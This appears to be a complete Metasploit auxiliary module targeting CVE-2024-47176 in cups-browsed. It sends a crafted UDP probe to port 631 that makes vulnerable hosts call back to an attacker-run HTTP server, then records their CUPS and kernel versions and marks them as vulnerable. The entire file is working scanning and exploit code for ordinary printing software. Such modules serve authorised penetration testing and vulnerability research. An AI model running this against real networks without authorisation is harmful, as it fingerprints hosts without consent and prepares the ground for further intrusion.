1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Auxiliary::UDPScanner
9
  include Msf::Exploit::Remote::HttpServer
10

11
  def initialize
12
    super(
13
      'Name' => 'cups-browsed Information Disclosure',
14
      'Description' => %q{
15
        Retrieve CUPS version and kernel version information from cups-browsed services.
16
      },
17
      'Author' => [
18
        'evilsocket', # discovery
19
        'bcoles' # msf
20
      ],
21
      'License' => MSF_LICENSE,
22
      'References' => [
23
        ['CVE', '2024-47176'],
24
        ['URL', 'https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8' ],
25
        ['URL', 'https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/' ],
26
      ],
27
      'DefaultOptions' => { 'RPORT' => 631 },
28
    )
29
    deregister_options('URIPATH')
30
  end
31

32
  def build_probe
33
    @probe ||= "0 3 #{get_uri}"
34
    @probe
35
  end
36

37
  def run
38
    start_service('Path' => "/printers/#{Rex::Text.rand_text_alphanumeric(10..16)}")
39
    super
40
  end
41

42
  def on_request_uri(cli, request)
43
    return if request.nil?
44

45
    info = request['User-Agent']
46

47
    return unless info.to_s.include?('CUPS')
48

49
    print_good("#{cli.peerhost}: #{info}")
50

51
    report_host(host: cli.peerhost)
52
    report_service(
53
      host: cli.peerhost,
54
      proto: 'udp',
55
      port: rport,
56
      name: 'cups-browsed',
57
      info: info
58
    )
59
    report_vuln({
60
      host: cli.peerhost,
61
      port: rport,
62
      proto: 'udp',
63
      name: 'cups-browsed Information Disclosure',
64
      refs: references
65
    })
66
  end
67
end
68

69